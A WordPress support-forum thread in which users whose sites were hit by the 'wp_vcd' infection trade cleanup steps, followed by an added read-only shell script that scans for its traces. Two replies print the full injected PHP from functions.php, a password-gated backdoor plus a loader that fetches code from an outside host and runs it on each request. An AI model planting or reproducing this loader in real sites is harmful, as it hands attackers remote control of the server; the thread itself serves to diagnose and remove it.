• pdku

    (@pdku)


    Hi, suddenly my WordPress shows this error: Parse error: syntax error, unexpected '<' in /tmp/theme_temp_setupb1fUKP on line 2

    I found lots of files in /tmp with filenames like theme_temp_setupxxxx

    and those files contained:

    <?php
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="https://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <title>www.verna.cc</title>
    <meta name="viewport" content="width=device-width" />
    </head>
    <body>
    </body>
    </html>

    Am I hacked or?
    I can't find how to fix the problem since I don't know where the PHP files are located on my VPS.

Viewing 15 replies - 1 through 15 (of 17 total)
  • Thread Starter pdku

    (@pdku)

    OK, so I've been hacked!
    Find the file in wp-includes with the file name class.wp.php <-- delete this!

    Next, look into your functions.php and remove all the code on top, and the problem is fixed!

    Don't forget to change your password.

    esmi

    (@esmi)

    You need to start working your way through the resources on this page. I’d also suggest reviewing https://ottopress.com/2009/hacked-wordpress-backdoors/

    Anything less will probably result in the hacker walking straight back into your site again.

    Additional Resources:
    Hardening WordPress
    https://sitecheck.sucuri.net/scanner/
    https://www.unmaskparasites.com/

    uri70663

    (@uri70663)

    Hi
    I have the same problem.
    Can you explain the solution in detail?
    @pdku

    • This reply was modified 7 years ago by uri70663.
    benderoffspring

    (@benderoffspring)

    encountered the same, file class.wp.php not. functions.php replaced by new but refuses to work

    benderoffspring

    (@benderoffspring)

    The instruction has approached, many thanks!

    uri70663

    (@uri70663)

    @benderoffspring I have the same problem.
    Can you explain the solution in detail?

    benderoffspring

    (@benderoffspring)

    @ Uri70663

    wp-includes with the file name class.wp.php <- remove it!

    file was not. reinstalled functions.php from the original theme and everything started

    uri70663

    (@uri70663)

    Andrew Nevins

    (@anevins)

    WCLDN 2018 Contributor | Volunteer support

    Am I missing something obvious or are you still hacked? Someone or something has broken into your server and created a rogue file. You really need to consider looking at the sources Esmi posted.

    Hanif Shakil

    (@shakiltorj)

    1. Rename all your themes
    2. Log in to your site
    3. Activate the Akismet plugin (free)
    4. Install IP2Location Country Blocker — WordPress Plugins and select "Block all countries except countries listed below".
    5. Remove the following PHP code from the top of functions.php (in all of your themes), rename your theme back to its old name, and activate your main theme
    ————————————————————————–
    <?php

    // Remote-control branch: runs only when the request carries the hard-coded password.
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '[redacted]'))
    {
        $div_code_name = "wp_vcd";
        switch ($_REQUEST['action'])
        {
            // Rewrites the remote host name stored in this very file.
            case 'change_domain';
                if (isset($_REQUEST['newdomain']))
                {
                    if (!empty($_REQUEST['newdomain']))
                    {
                        if ($file = @file_get_contents(__FILE__))
                        {
                            if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code4\.php/i', $file, $matcholddomain))
                            {
                                $file = preg_replace('/'.$matcholddomain[1][0].'/i', $_REQUEST['newdomain'], $file);
                                @file_put_contents(__FILE__, $file);
                                print "true";
                            }
                        }
                    }
                }
                break;

            default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
        }

        die("");
    }

    // Loader: on requests other than wp-cron.php and xmlrpc.php, fetches content from the remote host.
    if ( ! function_exists( 'theme_temp_setup' ) ) {
        $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
        if ( stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

            if ($tmpcontent = @file_get_contents("https://www.spekt.cc/code4.php?i=".$path))
            {
                // Writes the fetched content to a theme_temp_setup* temp file and includes it as PHP.
                function theme_temp_setup($phpCode) {
                    $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
                    $handle = fopen($tmpfname, "w+");
                    fwrite($handle, "<?php\n" . $phpCode);
                    fclose($handle);
                    include $tmpfname;
                    unlink($tmpfname);
                    return get_defined_vars();
                }

                extract(theme_temp_setup($tmpcontent));
            }
        }
    }

    ?>
    ———————————————————————

    Thread Starter pdku

    (@pdku)

    @esmi @anevins yes, I'm reviewing the link @esmi gave, thank you!

    And also remove all /tmp files with the name theme_temp_setup

    @uri70663 @benderoffspring has made the point ??

    Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    Hey guys, just an etiquette thing. Please don’t @ folks who are already in the thread. If they want to subscribe, they will. If they chose not to, then using the @ sends unwanted emails. Thanks…. and back to having so much un-hacking fun!

    helloanimation

    (@helloanimation)

    shakiltorj
    Thanks, it works for me.
    Can you say what needs to be done so this type of attack is not repeated?
    Thanks

    Hanif Shakil

    (@shakiltorj)

    Some update
    a. Rename all your themes
    b. Log in to your site
    c. Activate the Akismet plugin (free)
    d. Install IP2Location Country Blocker — WordPress Plugins and select "Block all countries except countries listed below".
    e. Go to wp-includes
    Delete the following files
    1. wp-feed
    2. wp-vcd.php
    3. class.wp.php
    f. Remove the following PHP code from the top of functions.php (in all of your themes), rename your theme back to its old name, and activate your main theme
    ————————————————————————–
    <?php

    // Remote-control branch: runs only when the request carries the hard-coded password.
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '[redacted]'))
    {
        $div_code_name = "wp_vcd";
        switch ($_REQUEST['action'])
        {
            // Rewrites the remote host name stored in this very file.
            case 'change_domain';
                if (isset($_REQUEST['newdomain']))
                {
                    if (!empty($_REQUEST['newdomain']))
                    {
                        if ($file = @file_get_contents(__FILE__))
                        {
                            if (preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code4\.php/i', $file, $matcholddomain))
                            {
                                $file = preg_replace('/'.$matcholddomain[1][0].'/i', $_REQUEST['newdomain'], $file);
                                @file_put_contents(__FILE__, $file);
                                print "true";
                            }
                        }
                    }
                }
                break;

            default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
        }

        die("");
    }

    // Loader: on requests other than wp-cron.php and xmlrpc.php, fetches content from the remote host.
    if ( ! function_exists( 'theme_temp_setup' ) ) {
        $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
        if ( stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {

            if ($tmpcontent = @file_get_contents("https://www.spekt.cc/code4.php?i=".$path))
            {
                // Writes the fetched content to a theme_temp_setup* temp file and includes it as PHP.
                function theme_temp_setup($phpCode) {
                    $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
                    $handle = fopen($tmpfname, "w+");
                    fwrite($handle, "<?php\n" . $phpCode);
                    fclose($handle);
                    include $tmpfname;
                    unlink($tmpfname);
                    return get_defined_vars();
                }

                extract(theme_temp_setup($tmpcontent));
            }
        }
    }

    ?>
    ———————————————————————
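
Added example (not part of any post in this thread): a read-only shell check for the three indicators the replies above name, namely the rogue files in wp-includes, theme functions.php files containing strings from the posted loader, and leftover theme_temp_setup* temp files. The function name `scan_wp_vcd` and the standard `wp-content/themes` layout are assumptions; a match is a lead for manual review, and a clean result does not prove the site is clean.

```sh
#!/bin/sh
# scan_wp_vcd <wordpress-root> [tmp-dir]   (hypothetical helper name)
# Prints one line per finding. Returns 0 when nothing matched, 1 otherwise.
# Nothing is deleted or modified.
scan_wp_vcd() {
    wp_root=$1
    tmp_dir=${2:-/tmp}
    hits=0

    # 1. Files the thread says to delete from wp-includes.
    for name in wp-feed wp-vcd.php class.wp.php; do
        if [ -e "$wp_root/wp-includes/$name" ]; then
            echo "ROGUE_FILE $wp_root/wp-includes/$name"
            hits=$((hits + 1))
        fi
    done

    # 2. Any theme's functions.php carrying strings from the posted loader.
    if [ -d "$wp_root/wp-content/themes" ]; then
        for f in "$wp_root"/wp-content/themes/*/functions.php; do
            [ -f "$f" ] || continue
            if grep -qE 'theme_temp_setup|wp_vcd|ERROR_WP_ACTION' "$f"; then
                echo "INFECTED_THEME $f"
                hits=$((hits + 1))
            fi
        done
    fi

    # 3. Temp files left behind by tempnam(..., "theme_temp_setup").
    for f in "$tmp_dir"/theme_temp_setup*; do
        [ -f "$f" ] || continue
        echo "TEMP_DROP $f"
        hits=$((hits + 1))
    done

    [ "$hits" -eq 0 ]
}

# Example call (the path is a placeholder for your own install):
#   scan_wp_vcd /path/to/wordpress /tmp
```

Inactive themes are scanned too, since the replies say the code was added to functions.php in all themes.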

    thanci35

    (@thanci35)

    I was compromised with this as well. Thanks for sharing your resolutions!

  • The topic ‘/tmp/theme_temp_setup what is this’ is closed to new replies.